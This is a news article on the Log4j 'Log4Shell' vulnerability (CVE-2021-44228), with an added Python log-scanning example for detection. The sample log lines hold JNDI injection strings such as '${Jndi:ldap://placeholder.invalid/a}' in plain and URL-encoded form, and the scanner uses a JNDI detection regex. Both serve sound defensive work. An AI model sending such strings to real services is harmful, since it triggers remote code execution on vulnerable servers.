Written by
Danny Palmer, Senior Reporter
Danny Palmer is a senior reporter at ZDNet. Based in London, he writes about issues including cybersecurity, hacking and malware threats.
on December 10, 2021
A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers.
Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application that utilises the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild.
Systems and services that use the Java logging library Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java.
The vulnerability was first discovered in Minecraft, but researchers warn that cloud applications are also vulnerable. Log4j is also used in enterprise applications, and it’s likely that many products will be found to be vulnerable as more is learned about the flaw.
A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”
LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.”
Organisations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings (CERT-NZ uses the example of “Jndi:ldap”), they could be affected.
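The log review described above can be scripted. The following is an added example, not code from the article, CERT-NZ or LunaSec: the function names are hypothetical, the sample log lines and host names are constructed, and the pattern generalises the “Jndi:ldap” indicator to any scheme after `jndi:`, ignoring case and percent-encoding.

```python
import re
from urllib.parse import unquote

# The page's indicator is "Jndi:ldap"; match any scheme, ignoring case.
JNDI_RE = re.compile(r"jndi:([a-z]+):", re.IGNORECASE)

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly: access logs store request data
    URL-encoded, sometimes more than once."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_lines(lines):
    """Return (line_number, scheme, decoded_line) for every line that
    contains a JNDI lookup string once it has been decoded."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        decoded = decode_fully(raw.rstrip("\n"))
        match = JNDI_RE.search(decoded)
        if match:
            hits.append((number, match.group(1).lower(), decoded))
    return hits

# Constructed sample lines (not real traffic); host names are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:09:14:05 +0000] "GET /search?q=jndi+tutorial HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:09:15:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${Jndi:ldap://placeholder.invalid/a}"',
    '198.51.100.23 - - [10/Dec/2021:09:15:12 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, scheme, line in scan_lines(SAMPLE_LOG):
        print(f"line {number}: jndi:{scheme} lookup string -> {line}")
```

A match shows that the string reached the log; whether the service could be affected still depends on the Log4j version it runs.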
To mitigate the vulnerability, users should set log4j2.formatMsgNoLookups to true by adding “-Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application.
To prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1.
“If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post.
“If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”